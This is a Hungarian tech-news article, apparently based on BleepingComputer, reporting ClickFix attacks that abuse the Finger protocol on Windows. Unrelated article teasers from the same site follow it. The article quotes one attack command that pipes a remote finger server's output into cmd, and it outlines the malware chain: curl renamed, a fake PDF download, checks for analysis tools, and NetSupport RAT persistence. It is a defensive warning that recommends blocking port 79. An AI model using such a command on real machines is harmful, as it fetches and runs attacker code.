Az elfeledett Finger-protokoll újra a hackerek fegyvere
Fontos kérdés, hogy vajon mennyire biztonságosak az évtizedekkel ezelőtt készült rendszerszolgáltatások a mai kibertámadásokkal szemben. Az egykor népszerű, de mára szinte elfeledett Finger protokoll most újra előkerült, méghozzá rosszindulatú célokra: hackerek működő Windows gépeken futtatnak távoli parancsokat ezzel a régi parancseszközzel.
Régi parancs, új veszélyek
A Finger protokollt eredetileg arra használták, hogy helyi vagy távoli felhasználók adatait, például felhasználónevet, utolsó aktivitást vagy elérhetőségeket jelenítsen meg Unix, majd Windows rendszereken is. Bár a finger parancs ma már szinte alig használatos, a támogatása megmaradt. Ez a sebezhetőség most támadási felületté vált: kiberbűnözők ClickFix néven emlegetett trükkel arra veszik rá az embereket, hogy engedélyezzenek rosszindulatú parancsfuttatást saját gépükön.
A ClickFix trükk működése
Más szóval, a támadó kihasználja, hogy az áldozat követ egy utasítást, például egy CAPTCHA-ablaknak tűnő ellenőrzést, amely valójában a Windows parancssor futtatására kér. A finger <felhasználó>@finger.cloudmega[.]org | cmd parancs egy internetes Finger-kiszolgálóról kér le utasításokat, majd azokat Windows rendszeren azonnal végre is hajtja. A letöltött parancs egy véletlenszerű nevű mappát hoz létre, ahová átmásolja a curl.exe programot új néven, majd egy ZIP-fájlt tölt le a cloudmega[.]org-ról, PDF-nek álcázva, és ebből Python-alapú kártevőt csomagol ki a gépre. Végül visszajelző parancsot küld a szervernek, miközben az áldozatnak csak egy újabb „igazolja, hogy ember” ablakot jelenít meg.
Továbbá hasonló támadásokat észleltek más domainekről is, például az api.metrics-strange.com-ról. Ezek a parancsok már olyan eszközöket is keresnek a gépeken, amelyeket malwareelemzők vagy rendszergazdák használnak (pl. Procmon, Wireshark, Fiddler, x64dbg), és ha ilyenekre bukkannak, a támadás leáll. Amennyiben nem észlelnek védelmi eszközt, a rendszerre egy NetSupport Manager nevű, távoli hozzáférést biztosító kártevőt telepítenek, amelyet ütemezett feladatként minden bejelentkezéskor elindítanak.
Hogyan védekezhetsz?
A támadás fő célja, hogy a felhasználótól minimális együttműködéssel rendszergazdai jogosultságot szerezzenek, kikerülve az ismert vírusvédelmi rendszereket. A védekezés legbiztosabb módja a Finger protokollt használó 79-es TCP-port internet felőli elérésének blokkolása, hiszen ezen keresztül futnak a rosszindulatú parancsok. Az ilyen, rég elfeledett protokollokat mindig érdemes időben letiltani, hiszen a támadók nem felejtenek.
2025, adminboss, www.bleepingcomputer.com alapján
filózó
Te eltiltanád az összes régi protokollt, vagy csak azt, amelyikre bizonyíték van, hogy veszélyes?
Te mit tennél, ha egy látszólag ártatlan ellenőrző ablak parancssort nyitna meg a gépeden?
Az online jelenlét a mindennapok része, de kevesen tudunk szabadulni attól a tapasztalattól, hogy minél több időt töltünk a közösségi oldalakon, annál rosszabbul érezzük magunkat...
🚧 Egy lényeges szempont, hogy amikor belépsz egy weboldalra, gyakran találkozol olyan feladatokkal, mint eltorzított szavak megfejtése, homályos képeken motorkerékpárok kiválasztása vagy annak igazolása, hogy nem vagy robot...
👀 Bérlakásokban vagy társasházakban élők számára valódi kihívás lehet biztonsági kamerát vagy videós kapucsengőt felszerelni, hiszen nem fúrhatnak falat és nem okozhatnak semmilyen maradandó károsodást...
💉 Felmerül a kérdés, hogy mennyire valóban hatékonyak, vagy akár biztonságosak azok a peptidkészítmények, amelyek jelenleg az egészségmegőrzés és a hosszú élet reményében terjednek az Egyesült Államokban...
Fizetős iOS appok és játékok, amik ingyenesek a mai napon. Monthly Dystopia (iPhone/iPad)A Monthly Dystopia egy izgalmas túlélőjáték, amely George Orwell 1984 című klasszikusának világát idézi...
Lassan minden csuklón ott virít egy okosóra vagy okoskarkötő. Ezek már régóta nem csak a lépésszámot vagy a pulzust figyelik: a korszerű modellek alvást, bőrhőmérsékletet, légzésszámot, véroxigént, szívritmus-változékonyságot is képesek mérni, sőt, akár arra is riasztanak, ha valami baljós jelet érzékelnek...
🚀 Érdemes megérteni, hogy a NASA új, különleges mentőakcióba kezdett: egy robotűrszondával igyekszik megmenteni az évtizedek óta szolgáló, és most veszélyesen zuhanó Neil Gehrels Swift Obszervatóriumot (Neil Gehrels Swift Observatory)...
🪐 Amikor először egy marsi kőzet felszínén összetett szerves szén jelenlétét észlelték, a tudósok hirtelen egy régóta húzódó kérdés kapujában találták magukat: vajon élet nyomait találtuk meg, vagy valami egészen más magyarázat rejtőzik a színfalak mögött?..
A Google eddig is számtalan MI-eszközt kínált a tanulni vágyóknak. A NotebookLM például képes feldolgozni és kreatívan átalakítani az általad feltöltött forrásokat – gondolj csak podcastokra vagy gondolattérképekre...
Érdekes felvetés, hogy mi történne, ha 250 véletlenszerűen kiválasztott embert összehívnánk, hogy megvitassanak egy fontos kérdést: vajon milyen eredményt adna, ha egy közös kihívást kellene megoldaniuk?..
Fontos kérdés, mire képesek a legújabb technológiák, ha rossz kezekbe kerülnek: a kutatók most először bukkantak olyan zsarolóvírusra, amelyben minden lépést egy önálló, nagyméretű nyelvi modell vezérelt...
🛡 Az FBI június 11-e óta folyamatosan figyeli a FIFA-világbajnokság helyszíneit és környékét, mióta rengeteg drónt kaptak el olyan légterekben, ahol repülni szigorúan tilos...
😫 Negyvenévesen Chrissi Kelly egyszer csak elvesztette a szaglását, miután egy vírusos betegség ledöntötte a lábáról Csehországban tett családi látogatása után...
Aki már kezd belefáradni a földi forgatagba, annak új lehetőség nyílik: a NASA önkénteseket keres, hogy egy teljes évet töltsenek elszigetelve, mintha egy másik égitestre készülnének...
🛠 A Midjourney szembeszállt a nagy hollywoodi stúdiókkal, miután azok tavaly beperelték szerzői jogsértés miatt, mert az MI-alapú képalkotó rendszer képes Supermanről, Batmanről és más híres karakterekről képeket generálni...
Érdekes jelenség, hogy az elmúlt időszakban egyre kifinomultabb adathalász szolgáltatások jelentek meg, amelyek célkeresztjében a vállalati felhasználók állnak...
💸 Érdekes felvetés, hogy az Egyesült Királyság új kriptovaluta-szabályozása globális kereskedelmi lehetőségeket nyithat meg, miközben komoly kihívásokat is tartogat...
Érdemes megvizsgálni, hogy az indonéziai Flores szigetén egykor élt, Homo floresiensisnek nevezett ősi emberfaj, vagyis a hobbitok, ténylegesen mennyire voltak találékonyak túlélésük során...